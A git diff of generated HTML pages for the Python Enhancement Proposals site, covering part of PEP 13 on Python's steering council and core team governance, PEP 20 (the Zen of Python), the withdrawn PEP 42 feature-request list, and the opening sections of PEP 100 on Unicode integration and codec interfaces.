  • Enforce or update the project’s code of conduct
  • +
  • Work with the PSF to manage any project assets
  • +
  • Delegate parts of their authority to other subcommittees or +processes
  • +
+

However, they cannot modify this PEP, or affect the membership of the +core team, except via the mechanisms specified in this PEP.

+

The council should look for ways to use these powers as little as +possible. Instead of voting, it’s better to seek consensus. Instead of +ruling on individual PEPs, it’s better to define a standard process +for PEP decision making (for example, by accepting one of the other +801x series of PEPs). It’s better to establish a Code of Conduct +committee than to rule on individual cases. And so on.

+

To use its powers, the council votes. Every council member must either +vote or explicitly abstain. Members with conflicts of interest on a +particular vote must abstain. Passing requires a strict majority of +non-abstaining council members.

+

Whenever possible, the council’s deliberations and votes shall be held +in public.

+
+
+

Electing the council

+

A council election consists of two phases:

+
    +
  • Phase 1: Candidates advertise their interest in serving. Candidates +must be nominated by a core team member. Self-nominations are +allowed.
  • +
  • Phase 2: Each core team member can assign zero to five stars to each +candidate. Voting is performed anonymously. The outcome of the vote +is determined using the STAR voting system, +modified to use the Multi-winner Bloc STAR) +approach. If a tie occurs, it may +be resolved by mutual agreement among the candidates, or else the +winner will be chosen at random.
  • +
+

Each phase lasts one to two weeks, at the outgoing council’s discretion. +For the initial election, both phases will last two weeks.

+

The election process is managed by a returns officer nominated by the +outgoing steering council. For the initial election, the returns +officer will be nominated by the PSF Executive Director.

+

The council should ideally reflect the diversity of Python +contributors and users, and core team members are encouraged to vote +accordingly.

+
+
+

Term

+

A new council is elected after each feature release. Each council’s +term runs from when their election results are finalized until the +next council’s term starts. There are no term limits.

+
+
+

Vacancies

+

Council members may resign their position at any time.

+

Whenever there is a vacancy during the regular council term, the +council may vote to appoint a replacement to serve out the rest of the +term.

+

If a council member drops out of touch and cannot be contacted for a +month or longer, then the rest of the council may vote to replace +them.

+
+
+

Conflicts of interest

+

While we trust council members to act in the best interests of Python +rather than themselves or their employers, the mere appearance of any +one company dominating Python development could itself be harmful and +erode trust. In order to avoid any appearance of conflict of interest, +at most 2 members of the council can work for any single employer.

+

In a council election, if 3 of the top 5 vote-getters work for the +same employer, then whichever of them ranked lowest is disqualified +and the 6th-ranking candidate moves up into 5th place; this is +repeated until a valid council is formed.

+

During a council term, if changing circumstances cause this rule to be +broken (for instance, due to a council member changing employment), +then one or more council members must resign to remedy the issue, and +the resulting vacancies can then be filled as normal.

+
+
+

Ejecting core team members

+

In exceptional circumstances, it may be necessary to remove someone +from the core team against their will. (For example: egregious and +ongoing code of conduct violations.) This can be accomplished by a +steering council vote, but unlike other steering council votes, this +requires at least a two-thirds majority. With 5 members voting, this +means that a 3:2 vote is insufficient; 4:1 in favor is the minimum +required for such a vote to succeed. In addition, this is the one +power of the steering council which cannot be delegated, and this +power cannot be used while a vote of no confidence is in process.

+

If the ejected core team member is also on the steering council, then +they are removed from the steering council as well.

+
+
+

Vote of no confidence

+

In exceptional circumstances, the core team may remove a sitting +council member, or the entire council, via a vote of no confidence.

+

A no-confidence vote is triggered when a core team member calls for +one publicly on an appropriate project communication channel, and +another core team member seconds the proposal within one week.

+

The vote lasts for two weeks. Core team members vote for or against. +If at least two thirds of voters express a lack of confidence, then +the vote succeeds.

+

There are two forms of no-confidence votes: those targeting a single +member, and those targeting the council as a whole. The initial call +for a no-confidence vote must specify which type is intended. If a +single-member vote succeeds, then that member is removed from the +council and the resulting vacancy can be handled in the usual way. If +a whole-council vote succeeds, the council is dissolved and a new +council election is triggered immediately.

+
+
+
+

The core team

+
+

Role

+

The core team is the group of trusted volunteers who manage Python. +They assume many roles required to achieve the project’s goals, +especially those that require a high level of trust. They make the +decisions that shape the future of the project.

+

Core team members are expected to act as role models for the community +and custodians of the project, on behalf of the community and all +those who rely on Python.

+

They will intervene, where necessary, in online discussions or at +official Python events on the rare occasions that a situation arises +that requires intervention.

+

They have authority over the Python Project infrastructure, including +the Python Project website itself, the Python GitHub organization and +repositories, the bug tracker, the mailing lists, IRC channels, etc.

+
+
+

Prerogatives

+

Core team members may participate in formal votes, typically to nominate new +team members and to elect the steering council.

+
+
+

Membership

+

Python core team members demonstrate:

+
    +
  • a good grasp of the philosophy of the Python Project
  • +
  • a solid track record of being constructive and helpful
  • +
  • significant contributions to the project’s goals, in any form
  • +
  • willingness to dedicate some time to improving Python
  • +
+

As the project matures, contributions go beyond code. Here’s an +incomplete list of areas where contributions may be considered for +joining the core team, in no particular order:

+
    +
  • Working on community management and outreach
  • +
  • Providing support on the mailing lists and on IRC
  • +
  • Triaging tickets
  • +
  • Writing patches (code, docs, or tests)
  • +
  • Reviewing patches (code, docs, or tests)
  • +
  • Participating in design decisions
  • +
  • Providing expertise in a particular domain (security, i18n, etc.)
  • +
  • Managing the continuous integration infrastructure
  • +
  • Managing the servers (website, tracker, documentation, etc.)
  • +
  • Maintaining related projects (alternative interpreters, core +infrastructure like packaging, etc.)
  • +
  • Creating visual designs
  • +
+

Core team membership acknowledges sustained and valuable efforts that +align well with the philosophy and the goals of the Python project.

+

It is granted by receiving at least two-thirds positive votes in a +core team vote that is open for one week and is not vetoed by the +steering council.

+
+

Note

+

The devguide has a suggested template +to use for such votes.

+
+

Core team members are always looking for promising contributors, +teaching them how the project is managed, and submitting their names +to the core team’s vote when they’re ready.

+

There’s no time limit on core team membership. However, in order to +provide the general public with a reasonable idea of how many people +maintain Python, core team members who have stopped contributing are +encouraged to declare themselves as “inactive”. Those who haven’t made +any non-trivial contribution in two years may be asked to move +themselves to this category, and moved there if they don’t respond. To +record and honor their contributions, inactive team members will +continue to be listed alongside active core team members; and, if they +later resume contributing, they can switch back to active status at +will. While someone is in inactive status, though, they lose their +active privileges like voting or nominating for the steering council, +and commit access.

+

The initial active core team members will consist of everyone +currently listed in the “Python core” team on GitHub (access +granted for core members only), and the +initial inactive members will consist of everyone else who has been a +committer in the past.

+
+
+
+

Changing this document

+

Changes to this document require at least a two-thirds majority of +votes cast in a core team vote which should be open for two weeks.

+

No vote is required to update note blocks and the “Current steering +council” and “History of council elections” sections with current +information.

+
+
+
+

History

+
+

Creation of this document

+

The Python project was started by Guido van Rossum, who served as its +Benevolent Dictator for Life (BDFL) from inception until July 2018, +when he stepped down.

+

After discussion, a number of proposals were put forward for a new +governance model, and the core devs voted to choose between them. The +overall process is described in PEP 8000 and PEP 8001, a review of +other projects was performed in PEP 8002, and the proposals themselves +were written up as the 801x series of PEPs. Eventually the proposal in +PEP 8016 was selected +as the new governance model, and was used to create the initial +version of this PEP. The 8000-series PEPs are preserved for historical +reference (and in particular, PEP 8016 contains additional rationale +and links to contemporary discussions), but this PEP is now the +official reference, and will evolve following the rules described +herein.

+
+
+

History of council elections

+ +
+
+

History of amendments

+
    +
  • 2019-04-17: Added the vote length for core devs and changes to this document.
  • +
  • 2024-12-10: +Adopted Multi-winner Bloc STAR voting for council elections.
  • +
  • 2024-12-10: +Added a one-week deadline for seconding a vote of no confidence.
  • +
+
+
+
+

Acknowledgements

+

This PEP began as PEP 8016, which was written by Nathaniel J. Smith +and Donald Stufft, based on a Django governance document written by +Aymeric Augustin, and incorporated feedback and assistance from +numerous others.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0013.rst

+

Last modified: 2024-12-13 07:56:19 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0020/index.html b/pep-0020/index.html new file mode 100644 index 00000000000..4630d9e6e61 --- /dev/null +++ b/pep-0020/index.html @@ -0,0 +1,176 @@ + + + + + + + + PEP 20 – The Zen of Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 20 – The Zen of Python

+
+
Author:
+
Tim Peters <tim.peters at gmail.com>
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
19-Aug-2004
+
Post-History:
+
22-Aug-2004
+
+
+
+
Table of Contents +
+
+

Abstract

+

Long time Pythoneer Tim Peters succinctly channels the BDFL’s guiding +principles for Python’s design into 20 aphorisms, only 19 of which +have been written down.

+
+
+

The Zen of Python

+
Beautiful is better than ugly.
+Explicit is better than implicit.
+Simple is better than complex.
+Complex is better than complicated.
+Flat is better than nested.
+Sparse is better than dense.
+Readability counts.
+Special cases aren't special enough to break the rules.
+Although practicality beats purity.
+Errors should never pass silently.
+Unless explicitly silenced.
+In the face of ambiguity, refuse the temptation to guess.
+There should be one-- and preferably only one --obvious way to do it.
+Although that way may not be obvious at first unless you're Dutch.
+Now is better than never.
+Although never is often better than *right* now.
+If the implementation is hard to explain, it's a bad idea.
+If the implementation is easy to explain, it may be a good idea.
+Namespaces are one honking great idea -- let's do more of those!
+
+
+
+
+

Easter Egg

+
>>> import this
+
+
+
+
+

References

+

Originally posted to comp.lang.python/python-list@python.org under a +thread called “The Way of Python”

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0020.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0042/index.html b/pep-0042/index.html new file mode 100644 index 00000000000..79381530ab7 --- /dev/null +++ b/pep-0042/index.html @@ -0,0 +1,377 @@ + + + + + + + + PEP 42 – Feature Requests | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 42 – Feature Requests

+
+
Author:
+
Jeremy Hylton <jeremy at alum.mit.edu>
+
Status:
+
Withdrawn
+
Type:
+
Process
+
Created:
+
12-Sep-2000
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Important

+

This PEP has been withdrawn.

+

×

+

It is obsolete. +All new feature requests should either go to the Python bug tracker +for very simple requests or the Ideas Discourse category for +everything else. The rest of this document is retained for historical +purposes only.

+

+
+
+

Introduction

+

This PEP contains a list of feature requests that may be considered +for future versions of Python. Large feature requests should not be +included here, but should be described in separate PEPs; however a +large feature request that doesn’t have its own PEP can be listed here +until its own PEP is created. See PEP 0 for details.

+

This PEP was created to allow us to close bug reports that are really +feature requests. Marked as Open, they distract from the list of real +bugs (which should ideally be less than a page). Marked as Closed, +they tend to be forgotten. The procedure now is: if a bug report is +really a feature request, add the feature request to this PEP; mark +the bug as “feature request”, “later”, and “closed”; and add a comment +to the bug saying that this is the case (mentioning the PEP +explicitly). It is also acceptable to move large feature requests +directly from the bugs database to a separate PEP.

+

This PEP should really be separated into four different categories +(categories due to Laura Creighton):

+
    +
  1. BDFL rejects as a bad idea. Don’t come back with it.
  2. +
  3. BDFL will put in if somebody writes the code. (Or at any rate, +BDFL will say ‘change this and I will put it in’ if you show up +with code.)

    possibly divided into:

    +
    +
      +
    1. BDFL would really like to see some code!
    2. +
    3. BDFL is never going to be enthusiastic about this, but +will work it in when it’s easy.
    4. +
    +
    +
  4. +
  5. If you show up with code, BDFL will make a pronouncement. It might +be ICK.
  6. +
  7. This is too vague. This is rejected, but only on the grounds of +vagueness. If you like this enhancement, make a new PEP.
  8. +
+
+
+

Core Language / Builtins

+
    +
  • The parser should handle more deeply nested parse trees.

    The following will fail – eval("["*50 + "]"*50) – because +the parser has a hard-coded limit on stack size. This limit should +be raised or removed. Removal would be hard because the current +compiler can overflow the C stack if the nesting is too deep.

    +

    https://bugs.python.org/issue215555

    +
  • +
  • Non-accidental IEEE-754 support (Infs, NaNs, settable traps, etc). +Big project.
  • +
  • Windows: Trying to create (or even access) files with certain +magic names can hang or crash Windows systems. This is really a +bug in the OSes, but some apps try to shield users from it. When +it happens, the symptoms are very confusing.

    Hang using files named prn.txt, etc https://bugs.python.org/issue481171

    +
  • +
  • eval and free variables: It might be useful if there was a way to +pass bindings for free variables to eval when a code object with +free variables is passed. https://bugs.python.org/issue443866
  • +
+
+
+

Standard Library

+
    +
  • The urllib module should support proxies which require +authentication. See SourceForge bug #210619 for information:

    https://bugs.python.org/issue210619

    +
  • +
  • os.rename() should be modified to handle EXDEV errors on platforms +that don’t allow rename() to operate across filesystem boundaries +by copying the file over and removing the original. Linux is one +system that requires this treatment.

    https://bugs.python.org/issue212317

    +
  • +
  • signal handling doesn’t always work as expected. E.g. if +sys.stdin.readline() is interrupted by a (returning) signal +handler, it returns “”. It would be better to make it raise an +exception (corresponding to EINTR) or to restart. But these +changes would have to applied to all places that can do blocking +interruptible I/O. So it’s a big project.

    https://bugs.python.org/issue210599

    +
  • +
  • Extend Windows utime to accept directory paths.

    https://bugs.python.org/issue214245

    +
  • +
  • Extend copy.py to module & function types.

    https://bugs.python.org/issue214553

    +
  • +
  • Better checking for bad input to marshal.load*().

    https://bugs.python.org/issue214754

    +
  • +
  • rfc822.py should be more lenient than the spec in the types of +address fields it parses. Specifically, an invalid address of the +form “From: Amazon.com <delivers-news2@amazon.com>” should be +parsed correctly.

    https://bugs.python.org/issue210678

    +
  • +
  • cgi.py’s FieldStorage class should be more conservative with memory +in the face of large binary file uploads.

    https://bugs.python.org/issue210674

    +

    There are two issues here: first, because +read_lines_to_outerboundary() uses readline() it is possible that a +large amount of data will be read into memory for a binary file +upload. This should probably look at the Content-Type header of the +section and do a chunked read if it’s a binary type.

    +

    The second issue was related to the self.lines attribute, which was +removed in revision 1.56 of cgi.py (see also):

    +

    https://bugs.python.org/issue219806

    +
  • +
  • urllib should support proxy definitions that contain just the host +and port

    https://bugs.python.org/issue210849

    +
  • +
  • urlparse should be updated to comply with RFC 2396, which defines +optional parameters for each segment of the path.

    https://bugs.python.org/issue210834

    +
  • +
  • The exceptions raised by pickle and cPickle are currently +different; these should be unified (probably the exceptions should +be defined in a helper module that’s imported by both). [No bug +report; I just thought of this.]
  • +
  • More standard library routines should support Unicode. For +example, urllib.quote() could convert Unicode strings to UTF-8 and +then do the usual %HH conversion. But this is not the only one!

    https://bugs.python.org/issue216716

    +
  • +
  • There should be a way to say that you don’t mind if str() or +__str__() return a Unicode string object. Or a different function +– ustr() has been proposed. Or something…

    http://sf.net/patch/?func=detailpatch&patch_id=101527&group_id=5470

    +
  • +
  • Killing a thread from another thread. Or maybe sending a signal. +Or maybe raising an asynchronous exception.

    https://bugs.python.org/issue221115

    +
  • +
  • The debugger (pdb) should understand packages.

    https://bugs.python.org/issue210631

    +
  • +
  • Jim Fulton suggested the following:
    I wonder if it would be a good idea to have a new kind of
    +temporary file that stored data in memory unless:
    +
    +- The data exceeds some size, or
    +
    +- Somebody asks for a fileno.
    +
    +Then the cgi module (and other apps) could use this thing in a
    +uniform way.
    +
    +
    +

    https://bugs.python.org/issue415692

    +
  • +
  • Jim Fulton pointed out that binascii’s b2a_base64() function has +situations where it makes sense not to append a newline, or to +append something else than a newline.

    Proposal:

    +
      +
    • add an optional argument giving the delimiter string to be +appended, defaulting to “\n”
    • +
    • possibly special-case None as the delimiter string to avoid adding +the pad bytes too???
    • +
    +

    https://bugs.python.org/issue415694

    +
  • +
  • pydoc should be integrated with the HTML docs, or at least be able +to link to them.

    https://bugs.python.org/issue405554

    +
  • +
  • Distutils should deduce dependencies for .c and .h files.

    https://bugs.python.org/issue472881

    +
  • +
  • asynchat is buggy in the face of multithreading.

    https://bugs.python.org/issue595217

    +
  • +
  • It would be nice if the higher level modules (httplib, smtplib, +nntplib, etc.) had options for setting socket timeouts.

    https://bugs.python.org/issue723287

    +
  • +
  • The curses library is missing two important calls: newterm() and +delscreen()

    https://bugs.python.org/issue665572, http://bugs.debian.org/175590

    +
  • +
  • It would be nice if the built-in SSL socket type could be used for +non-blocking SSL I/O. Currently packages such as Twisted which +implement async servers using SSL have to require third-party +packages such as pyopenssl.
  • +
  • reST as a standard library module
  • +
  • The import lock could use some redesign.

    https://bugs.python.org/issue683658

    +
  • +
  • A nicer API to open text files, replacing the ugly (in some +people’s eyes) “U” mode flag. There’s a proposal out there to have +a new built-in type textfile(filename, mode, encoding). (Shouldn’t +it have a bufsize argument too?)
  • +
  • Support new widgets and/or parameters for Tkinter
  • +
  • For a class defined inside another class, the __name__ should be +“outer.inner”, and pickling should work. (GvR is no longer certain +this is easy or even right.)

    https://bugs.python.org/issue633930

    +
  • +
  • Decide on a clearer deprecation policy (especially for modules) and +act on it.

    https://mail.python.org/pipermail/python-dev/2002-April/023165.html

    +
  • +
  • Provide alternatives for common uses of the types module; Skip +Montanaro has posted a proto-PEP for this idea:

    https://mail.python.org/pipermail/python-dev/2002-May/024346.html

    +
  • +
  • Use pending deprecation for the types and string modules. This +requires providing alternatives for the parts that aren’t covered +yet (e.g. string.whitespace and types.TracebackType). It seems we +can’t get consensus on this.
  • +
  • Lazily tracking tuples?

    https://mail.python.org/pipermail/python-dev/2002-May/023926.html +https://bugs.python.org/issue558745

    +
  • +
  • Make ‘as’ a keyword. It has been a pseudo-keyword long enough. +(It’s deprecated in 2.5, and will become a keyword in 2.6.)
  • +
+
+
+

C API wishes

+
    +
  • Add C API functions to help Windows users who are building embedded +applications where the FILE * structure does not match the FILE * +the interpreter was compiled with.

    https://bugs.python.org/issue210821

    +

    See this bug report for a specific suggestion that will allow a +Borland C++ builder application to interact with a python.dll build +with MSVC.

    +
  • +
+
+
+

Tools

+ +
+
+

Building and Installing

+
    +
  • Modules/makesetup should make sure the ‘config.c’ file it generates +from the various Setup files, is valid C. It currently accepts +module names with characters that are not allowable in Python or C +identifiers.

    https://bugs.python.org/issue216326

    +
  • +
  • Building from source should not attempt to overwrite the +Include/graminit.h and Parser/graminit.c files, at least for people +downloading a source release rather than working from Subversion or +snapshots. Some people find this a problem in unusual build +environments.

    https://bugs.python.org/issue219221

    +
  • +
  • The configure script has probably grown a bit crufty with age and +may not track autoconf’s more recent features very well. It should +be looked at and possibly cleaned up.

    https://mail.python.org/pipermail/python-dev/2004-January/041790.html

    +
  • +
  • Make Python compliant to the FHS (the Filesystem Hierarchy +Standard)

    http://bugs.python.org/issue588756

    +
  • +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0042.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0100/index.html b/pep-0100/index.html new file mode 100644 index 00000000000..68ab6bc72ad --- /dev/null +++ b/pep-0100/index.html @@ -0,0 +1,1314 @@ + + + + + + + + PEP 100 – Python Unicode Integration | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 100 – Python Unicode Integration

+
+
Author:
+
Marc-André Lemburg <mal at lemburg.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
10-Mar-2000
+
Python-Version:
+
2.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Historical Note

+

This document was first written by Marc-Andre in the pre-PEP days, +and was originally distributed as Misc/unicode.txt in Python +distributions up to and included Python 2.1. The last revision of +the proposal in that location was labeled version 1.7 (CVS +revision 3.10). Because the document clearly serves the purpose +of an informational PEP in the post-PEP era, it has been moved +here and reformatted to comply with PEP guidelines. Future +revisions will be made to this document, while Misc/unicode.txt +will contain a pointer to this PEP.

+

-Barry Warsaw, PEP editor

+
+
+

Introduction

+

The idea of this proposal is to add native Unicode 3.0 support to +Python in a way that makes use of Unicode strings as simple as +possible without introducing too many pitfalls along the way.

+

Since this goal is not easy to achieve – strings being one of the +most fundamental objects in Python – we expect this proposal to +undergo some significant refinements.

+

Note that the current version of this proposal is still a bit +unsorted due to the many different aspects of the Unicode-Python +integration.

+

The latest version of this document is always available at: +http://starship.python.net/~lemburg/unicode-proposal.txt

+

Older versions are available as: +http://starship.python.net/~lemburg/unicode-proposal-X.X.txt

+

[ed. note: new revisions should be made to this PEP document, +while the historical record previous to version 1.7 should be +retrieved from MAL’s url, or Misc/unicode.txt]

+
+
+

Conventions

+
    +
  • In examples we use u = Unicode object and s = Python string
  • +
  • ‘XXX’ markings indicate points of discussion (PODs)
  • +
+
+
+

General Remarks

+
    +
  • Unicode encoding names should be lower case on output and +case-insensitive on input (they will be converted to lower case +by all APIs taking an encoding name as input).
  • +
  • Encoding names should follow the name conventions as used by the +Unicode Consortium: spaces are converted to hyphens, e.g. ‘utf +16’ is written as ‘utf-16’.
  • +
  • Codec modules should use the same names, but with hyphens +converted to underscores, e.g. utf_8, utf_16, iso_8859_1.
  • +
+
+
+

Unicode Default Encoding

+

The Unicode implementation has to make some assumption about the +encoding of 8-bit strings passed to it for coercion and about the +encoding to as default for conversion of Unicode to strings when +no specific encoding is given. This encoding is called <default +encoding> throughout this text.

+

For this, the implementation maintains a global which can be set +in the site.py Python startup script. Subsequent changes are not +possible. The <default encoding> can be set and queried using the +two sys module APIs:

+
+
sys.setdefaultencoding(encoding)
Sets the <default encoding> used by the Unicode implementation. +encoding has to be an encoding which is supported by the +Python installation, otherwise, a LookupError is raised.

Note: This API is only available in site.py! It is +removed from the sys module by site.py after usage.

+
+
sys.getdefaultencoding()
Returns the current <default encoding>.
+
+

If not otherwise defined or set, the <default encoding> defaults +to ‘ascii’. This encoding is also the startup default of Python +(and in effect before site.py is executed).

+

Note that the default site.py startup module contains disabled +optional code which can set the <default encoding> according to +the encoding defined by the current locale. The locale module is +used to extract the encoding from the locale default settings +defined by the OS environment (see locale.py). If the encoding +cannot be determined, is unknown or unsupported, the code defaults +to setting the <default encoding> to ‘ascii’. To enable this +code, edit the site.py file or place the appropriate code into the +sitecustomize.py module of your Python installation.

+
+
+

Unicode Constructors

+

Python should provide a built-in constructor for Unicode strings +which is available through __builtins__:

+
u = unicode(encoded_string[,encoding=<default encoding>][,errors="strict"])
+
+u = u'<unicode-escape encoded Python string>'
+
+u = ur'<raw-unicode-escape encoded Python string>'
+
+
+

With the ‘unicode-escape’ encoding being defined as:

+
    +
  • all non-escape characters represent themselves as Unicode +ordinal (e.g. ‘a’ -> U+0061).
  • +
  • all existing defined Python escape sequences are interpreted as +Unicode ordinals; note that \xXXXX can represent all Unicode +ordinals, and \OOO (octal) can represent Unicode ordinals up to +U+01FF.
  • +
  • a new escape sequence, \uXXXX, represents U+XXXX; it is a syntax +error to have fewer than 4 digits after \u.
  • +
+

For an explanation of possible values for errors see the Codec +section below.

+

Examples:

+
u'abc'          -> U+0061 U+0062 U+0063
+u'\u1234'       -> U+1234
+u'abc\u1234\n'  -> U+0061 U+0062 U+0063 U+1234 U+005c
+
+
+

The ‘raw-unicode-escape’ encoding is defined as follows:

+
    +
  • \uXXXX sequence represent the U+XXXX Unicode character if and +only if the number of leading backslashes is odd
  • +
  • all other characters represent themselves as Unicode ordinal +(e.g. ‘b’ -> U+0062)
  • +
+

Note that you should provide some hint to the encoding you used to +write your programs as pragma line in one the first few comment +lines of the source file (e.g. ‘# source file encoding: latin-1’). +If you only use 7-bit ASCII then everything is fine and no such +notice is needed, but if you include Latin-1 characters not +defined in ASCII, it may well be worthwhile including a hint since +people in other countries will want to be able to read your source +strings too.

+
+
+

Unicode Type Object

+

Unicode objects should have the type UnicodeType with type name +‘unicode’, made available through the standard types module.

+
+
+

Unicode Output

+

Unicode objects have a method .encode([encoding=<default encoding>]) +which returns a Python string encoding the Unicode string using the +given scheme (see Codecs).

+
print u := print u.encode()   # using the <default encoding>
+
+str(u)  := u.encode()         # using the <default encoding>
+
+repr(u) := "u%s" % repr(u.encode('unicode-escape'))
+
+
+

Also see Internal Argument Parsing and Buffer Interface for +details on how other APIs written in C will treat Unicode objects.

+
+
+

Unicode Ordinals

+

Since Unicode 3.0 has a 32-bit ordinal character set, the +implementation should provide 32-bit aware ordinal conversion +APIs:

+
ord(u[:1]) (this is the standard ord() extended to work with Unicode
+            objects)
+  --> Unicode ordinal number (32-bit)
+
+unichr(i)
+    --> Unicode object for character i (provided it is 32-bit);
+        ValueError otherwise
+
+
+

Both APIs should go into __builtins__ just like their string +counterparts ord() and chr().

+

Note that Unicode provides space for private encodings. Usage of +these can cause different output representations on different +machines. This problem is not a Python or Unicode problem, but a +machine setup and maintenance one.

+
+
+

Comparison & Hash Value

+

Unicode objects should compare equal to other objects after these +other objects have been coerced to Unicode. For strings this +means that they are interpreted as Unicode string using the +<default encoding>.

+

Unicode objects should return the same hash value as their ASCII +equivalent strings. Unicode strings holding non-ASCII values are +not guaranteed to return the same hash values as the default +encoded equivalent string representation.

+

When compared using cmp() (or PyObject_Compare()) the +implementation should mask TypeErrors raised during the conversion +to remain in synch with the string behavior. All other errors +such as ValueErrors raised during coercion of strings to Unicode +should not be masked and passed through to the user.

+

In containment tests (‘a’ in u’abc’ and u’a’ in ‘abc’) both sides +should be coerced to Unicode before applying the test. Errors +occurring during coercion (e.g. None in u’abc’) should not be +masked.

+
+
+

Coercion

+

Using Python strings and Unicode objects to form new objects +should always coerce to the more precise format, i.e. Unicode +objects.

+
u + s := u + unicode(s)
+
+s + u := unicode(s) + u
+
+
+

All string methods should delegate the call to an equivalent +Unicode object method call by converting all involved strings to +Unicode and then applying the arguments to the Unicode method of +the same name, e.g.

+
string.join((s,u),sep) := (s + sep) + u
+
+sep.join((s,u)) := (s + sep) + u
+
+
+

For a discussion of %-formatting w/r to Unicode objects, see +Formatting Markers.

+
+
+

Exceptions

+

UnicodeError is defined in the exceptions module as a subclass of +ValueError. It is available at the C level via +PyExc_UnicodeError. All exceptions related to Unicode +encoding/decoding should be subclasses of UnicodeError.

+
+
+

Codecs (Coder/Decoders) Lookup

+

A Codec (see Codec Interface Definition) search registry should be +implemented by a module “codecs”:

+
codecs.register(search_function)
+
+
+

Search functions are expected to take one argument, the encoding +name in all lower case letters and with hyphens and spaces +converted to underscores, and return a tuple of functions +(encoder, decoder, stream_reader, stream_writer) taking the +following arguments:

+
+
encoder and decoder
These must be functions or methods which have the same +interface as the .encode/.decode methods of Codec instances +(see Codec Interface). The functions/methods are expected to +work in a stateless mode.
+
stream_reader and stream_writer
These need to be factory functions with the following +interface:
factory(stream,errors='strict')
+
+
+

The factory functions must return objects providing the +interfaces defined by StreamWriter/StreamReader resp. (see +Codec Interface). Stream codecs can maintain state.

+

Possible values for errors are defined in the Codec section +below.

+
+
+

In case a search function cannot find a given encoding, it should +return None.

+

Aliasing support for encodings is left to the search functions to +implement.

+

The codecs module will maintain an encoding cache for performance +reasons. Encodings are first looked up in the cache. If not +found, the list of registered search functions is scanned. If no +codecs tuple is found, a LookupError is raised. Otherwise, the +codecs tuple is stored in the cache and returned to the caller.

+

To query the Codec instance the following API should be used:

+
codecs.lookup(encoding)
+
+
+

This will either return the found codecs tuple or raise a +LookupError.

+
+
+

Standard Codecs

+

Standard codecs should live inside an encodings/ package directory +in the Standard Python Code Library. The __init__.py file of that +directory should include a Codec Lookup compatible search function +implementing a lazy module based codec lookup.

+

Python should provide a few standard codecs for the most relevant +encodings, e.g.

+
'utf-8':              8-bit variable length encoding
+'utf-16':             16-bit variable length encoding (little/big endian)
+'utf-16-le':          utf-16 but explicitly little endian
+'utf-16-be':          utf-16 but explicitly big endian
+'ascii':              7-bit ASCII codepage
+'iso-8859-1':         ISO 8859-1 (Latin 1) codepage
+'unicode-escape':     See Unicode Constructors for a definition
+'raw-unicode-escape': See Unicode Constructors for a definition
+'native':             Dump of the Internal Format used by Python
+
+
+

Common aliases should also be provided per default, e.g. +‘latin-1’ for ‘iso-8859-1’.

+

Note: ‘utf-16’ should be implemented by using and requiring byte +order marks (BOM) for file input/output.

+

All other encodings such as the CJK ones to support Asian scripts +should be implemented in separate packages which do not get +included in the core Python distribution and are not a part of +this proposal.

+
+
+

Codecs Interface Definition

+

The following base class should be defined in the module “codecs”. +They provide not only templates for use by encoding module +implementors, but also define the interface which is expected by +the Unicode implementation.

+

Note that the Codec Interface defined here is well suitable for a +larger range of applications. The Unicode implementation expects +Unicode objects on input for .encode() and .write() and character +buffer compatible objects on input for .decode(). Output of +.encode() and .read() should be a Python string and .decode() must +return an Unicode object.

+

First, we have the stateless encoders/decoders. These do not work +in chunks as the stream codecs (see below) do, because all +components are expected to be available in memory.

+
class Codec:
+
+    """Defines the interface for stateless encoders/decoders.
+
+       The .encode()/.decode() methods may implement different
+       error handling schemes by providing the errors argument.
+       These string values are defined:
+
+         'strict'  - raise an error (or a subclass)
+         'ignore'  - ignore the character and continue with the next
+         'replace' - replace with a suitable replacement character;
+                     Python will use the official U+FFFD
+                     REPLACEMENT CHARACTER for the builtin Unicode
+                     codecs.
+    """
+
+    def encode(self,input,errors='strict'):
+
+        """Encodes the object input and returns a tuple (output
+           object, length consumed).
+
+           errors defines the error handling to apply.  It
+           defaults to 'strict' handling.
+
+           The method may not store state in the Codec instance.
+           Use StreamCodec for codecs which have to keep state in
+           order to make encoding/decoding efficient.
+        """
+
+    def decode(self,input,errors='strict'):
+
+        """Decodes the object input and returns a tuple (output
+           object, length consumed).
+
+           input must be an object which provides the
+           bf_getreadbuf buffer slot.  Python strings, buffer
+           objects and memory mapped files are examples of objects
+           providing this slot.
+
+           errors defines the error handling to apply.  It
+           defaults to 'strict' handling.
+
+           The method may not store state in the Codec instance.
+           Use StreamCodec for codecs which have to keep state in
+           order to make encoding/decoding efficient.
+
+        """
+
+
+

StreamWriter and StreamReader define the interface for stateful +encoders/decoders which work on streams. These allow processing +of the data in chunks to efficiently use memory. If you have +large strings in memory, you may want to wrap them with cStringIO +objects and then use these codecs on them to be able to do chunk +processing as well, e.g. to provide progress information to the +user.

+
class StreamWriter(Codec):
+
+    def __init__(self,stream,errors='strict'):
+
+        """Creates a StreamWriter instance.
+
+           stream must be a file-like object open for writing
+           (binary) data.
+
+           The StreamWriter may implement different error handling
+           schemes by providing the errors keyword argument.
+           These parameters are defined:
+
+             'strict' - raise a ValueError (or a subclass)
+             'ignore' - ignore the character and continue with the next
+             'replace'- replace with a suitable replacement character
+        """
+        self.stream = stream
